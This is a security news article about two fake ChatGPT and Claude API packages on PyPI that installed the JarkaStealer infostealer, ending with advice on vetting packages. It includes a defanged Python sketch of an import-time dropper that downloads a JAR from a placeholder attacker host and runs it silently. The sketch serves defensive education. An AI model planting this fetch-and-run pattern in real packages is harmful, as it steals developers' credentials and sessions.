A newly uncovered attack uses two malicious Python packages, gptplus and claudeai-eng, to deliver the JarkaStealer malware to developers around the world. These packages, which masquerade as free tools for accessing the APIs of OpenAI's ChatGPT and Anthropic's Claude platforms, have raised alarms about the vulnerabilities inherent in open-source ecosystems. If you've ever searched for a quick and free way to integrate AI APIs into your projects, you could easily have fallen victim to these fake ChatGPT and Claude API packages.
The GenAI Gold Rush
Generative AI tools like ChatGPT and Claude have revolutionized how we approach coding, content creation, and problem-solving. By offering unprecedented capabilities in natural language understanding and generation, they've attracted millions of developers seeking to integrate their functionalities into applications.
However, access to premium features of these platforms often requires payment, creating an opportunity for malicious actors. Attackers prey on developers who are eager to bypass these paywalls, offering seemingly legitimate free alternatives.
The fake ChatGPT and Claude API packages, gptplus and claudeai-eng, exemplify this strategy. Claiming to provide API access to GPT-4 Turbo and Claude, these packages promised developers a shortcut to harnessing GenAI's power. Instead, they delivered malware hidden in plain sight.
The Mechanics of Deception
What makes the gptplus and claudeai-eng attack notable is its subtlety. Both packages were designed to look and feel legitimate:
- Functionality Mimicry: Once installed, the packages provided limited interaction with ChatGPT's demo version, giving the appearance of working as advertised.
- Illusion of Legitimacy: The attackers went to extra lengths to make the packages appear functional, reducing suspicion among users.
However, beneath this façade lay a darker reality. The packages were programmed to deploy a Java archive (JAR) file containing JarkaStealer, a malicious infostealer.
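The packages' full source has not been published, but the behavior described matches a classic two-stage dropper. The sketch below is a simplified, defanged reconstruction of that pattern, not the actual malware code; the URL and file name are placeholders. It is included only so reviewers know what this technique tends to look like inside a suspicious package's `__init__.py`:

```python
# Defanged illustration of the two-stage dropper pattern -- NOT the real
# malware. The URL and file name below are placeholders, not real infrastructure.
import subprocess
import tempfile
import urllib.request
from pathlib import Path

PAYLOAD_URL = "https://attacker.example.invalid/JavaUpdater.jar"  # placeholder

def _fetch_and_run_payload() -> None:
    # Stage 1: quietly download a JAR into a temp directory at import time.
    jar_path = Path(tempfile.gettempdir()) / "JavaUpdater.jar"
    urllib.request.urlretrieve(PAYLOAD_URL, jar_path)
    # Stage 2: hand execution to the Java runtime in the background, while
    # the package's visible API keeps "working" as advertised.
    subprocess.Popen(
        ["java", "-jar", str(jar_path)],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
```

The telltale sign is a package that reaches out to the network and spawns a Java runtime at import time, even though its stated job is wrapping a REST API.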
What is JarkaStealer?
JarkaStealer is a low-cost but effective piece of malware sold on the Russian-language dark web for as little as $20. While its source code is freely available on GitHub, many attackers opt to buy pre-configured versions, with optional modifications priced between $3 and $10.
Capabilities of JarkaStealer:
- Data Exfiltration: Extracts sensitive information, including saved passwords, cookies, and autofill data from browsers.
- Session Hijacking: Captures tokens from widely used apps such as Telegram, Discord, and Steam.
- Surveillance: Takes screenshots of the victim's desktop to gather additional context about their activities.
- Cross-Platform Impact: Targets both Windows and Linux systems, increasing its reach.
While JarkaStealer isn't the most sophisticated infostealer, its affordability and availability make it a popular choice for cybercriminals. In this case, the attackers leveraged the hype around GenAI to distribute the malware to unsuspecting developers.
A Year of Stealthy Deception
The fake ChatGPT and Claude API packages remained undetected on PyPI, the official repository for Python packages, for an entire year. During this time, they were downloaded over 1,700 times across more than 30 countries, including the United States, exposing each of those users to potential data theft.
Interestingly, download analytics from the PyPI tracking tool ClickPy reveal some peculiar trends:
- The gptplus package experienced a surge in downloads on its first day, likely due to artificial inflation by the attackers. This tactic aimed to create a false sense of legitimacy, as developers often equate high download numbers with trustworthiness.
- The claudeai-eng package saw more organic growth, particularly during February and March, indicating genuine interest from developers.
These patterns highlight how attackers strategically manipulate perceptions to exploit trust in open-source ecosystems.
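ClickPy is one frontend for this data, but the same daily counts are available from the public pypistats.org API, so you can look for first-day spikes yourself. The sketch below is a minimal example: the 5x threshold is an arbitrary illustration rather than an established heuristic, and pypistats only retains recent months of history, so the earliest retained day may not be the release day.

```python
# Sketch: pull daily download counts from the public pypistats.org API
# and flag a suspicious first-day spike. The threshold is arbitrary.
import json
import urllib.request

def daily_downloads(package: str) -> list[dict]:
    url = f"https://pypistats.org/api/packages/{package}/overall?mirrors=false"
    with urllib.request.urlopen(url) as resp:
        # Each row looks like {"date": "2024-02-01", "downloads": 42, ...}
        return json.load(resp)["data"]

rows = sorted(daily_downloads("requests"), key=lambda r: r["date"])
first_day = rows[0]["downloads"]
baseline = sum(r["downloads"] for r in rows[1:8]) / 7  # next week's daily average
if baseline and first_day > 5 * baseline:
    print(f"First-day spike: {first_day} downloads vs ~{baseline:.0f}/day after")
```

Substitute the name of whichever package you are checking; removed packages may no longer return data.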
This incident underscores critical challenges in securing open-source platforms. As organizations increasingly rely on open-source software, attackers are exploiting this trust to distribute malware. Cybersecurity professionals must take proactive measures to mitigate such risks.
Protecting Yourself from Fake ChatGPT and Claude API Packages
- Always verify the legitimacy of open-source packages before downloading. Check for reputable authors, a history of updates, and community reviews; suspicious packages often lack these markers (a minimal vetting sketch follows this list).
- Tools like Sonatype Nexus, Snyk, and Dependabot can detect malicious or vulnerable dependencies, reducing the risk of compromise.
- Developers are often the first line of defense. Conduct regular training on recognizing red flags, such as unusual package names, vague descriptions, or newly published packages with limited documentation.
- Adopt a zero-trust approach to supply chain security. Ensure continuous monitoring of software dependencies and maintain a comprehensive software bill of materials (SBOM) for all projects.
- Encourage teams to stay updated on security advisories related to PyPI and other repositories. Tools like PyPI's RSS feeds or community forums can provide timely updates on emerging threats.
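As a starting point for the first item above, PyPI's public JSON API (https://pypi.org/pypi/&lt;name&gt;/json) exposes enough metadata for a quick sanity check before you run pip install. The sketch below is a minimal illustration; the specific red flags are assumptions about what "suspicious" looks like, not authoritative rules, and no metadata check replaces actually reading the code.

```python
# Minimal package-vetting sketch against PyPI's public JSON API.
# The red-flag heuristics are illustrative assumptions, not authoritative.
import json
import urllib.request

def vet_package(name: str) -> None:
    with urllib.request.urlopen(f"https://pypi.org/pypi/{name}/json") as resp:
        meta = json.load(resp)

    info, releases = meta["info"], meta["releases"]
    flags = []
    if not info.get("home_page") and not info.get("project_urls"):
        flags.append("no homepage or repository link")
    if len(releases) <= 1:
        flags.append("single release, no update history")
    if not (info.get("description") or "").strip():
        flags.append("empty long description")
    print(f"{name}: {'; '.join(flags) if flags else 'no obvious red flags'}")

vet_package("requests")  # substitute the package you are about to install
```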
Conclusion
As George Apostolopoulos from Endor Labs aptly puts it, "AI is very hot, but many services require you to pay. People that don't know better will fall for this."
The fake ChatGPT and Claude API packages, gptplus and claudeai-eng, are just the tip of the iceberg in a growing wave of attacks targeting GenAI users. For developers, organizations, and cybersecurity professionals alike, the takeaway is clear: proactive vigilance is the best defense.
By fostering a culture of security awareness, implementing robust safeguards, and staying informed about emerging threats, we can ensure that the promise of generative AI is not overshadowed by exploitation. The next time you encounter a "too-good-to-be-true" tool, think twice, because free might just cost you more than you can afford.